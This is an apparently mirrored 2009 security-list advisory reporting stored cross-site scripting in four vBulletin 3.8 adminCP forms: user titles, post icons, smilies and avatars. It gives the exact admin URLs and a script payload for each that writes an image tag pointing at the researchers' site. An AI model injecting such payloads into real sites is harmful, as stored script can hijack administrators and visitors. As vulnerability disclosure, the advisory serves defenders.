Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

New vulnerabilities in Power Phlogger

Amaya 11.1 XHTML Parser Buffer Overflow

Joomla Component com_bookjoomlas SQL Injection Vulnerability

Family Connections 1.8.2 Blind SQL Injection (Correct Version)

From:	dontcontactorspamme_(at)_aria-security.com <dontcontactorspamme_(at)_aria-security.com>
Date:	07.04.2009
Subject:	[Aria-Security.com] vBulletin multiple XSS

vBulletin 3.8.2 adminCP Cross-Site Scripting
R.I.P DrtRp - We miss you
---------------------------------------------
Original Post at http://forum.aria-security.com/en/showthread.php?p=1179
Greetz to Aura & all Aria-Security Mods & Members

These were all tested on vbulletin 3.8.0 RC2 so other version may be effected.

1. Users Title. admincp/usertitle.php?do=modify. Add a new title. use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')<
/script>
or any other XSS code.

2.Post Icons. admincp/image.php?do=add&table=icon add new title.. give a wrong path such as /images/aria.gif.  use the
following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')<
/script>

3.Post new Smilies. image.php?do=add&table=smilie ... SAME AS #2.  use the following code as title name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')<
/script>

4.New avatar. admincp/image.php?do=add&table=avatar Same as #2. dont forget the update. use the following code as title
name.

<script>document.write('<img src="http://forum.aria-security.com/fa/cb/cb/logo.gif">')<
/script>



The-0utl4w
http://Aria-Security.com
/* the-0utl4w.com